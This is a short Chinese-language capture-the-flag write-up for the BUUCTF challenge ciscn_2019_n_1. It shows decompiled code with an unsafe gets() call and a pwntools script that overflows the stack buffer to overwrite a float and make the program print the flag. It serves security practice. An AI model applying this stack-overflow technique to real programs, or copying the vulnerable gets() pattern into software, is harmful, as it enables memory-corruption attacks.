[BUUCTF]ciscn_2019_n_1

checksec：

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

main函数内容如下：

int func()
{
  int result; // eax
  char v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets((__int64)&v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}

是考察溢出又不是普通的考察溢出^^。
因为rbp-30h是存储v1的地址，rbp-4h是存储 v2的地址。
所以在(30h-4h）见填充'a'，在开始存储v2的地址处填入11.28125的十六进制数即可，十六进制的值在IDA里可以看见。

from pwn import *

io = remote('node4.buuoj.cn','27329')
payload = 'a'*(0x30-0x4)+p64(0x41348000)
io.sendline(payload)
io.interactive()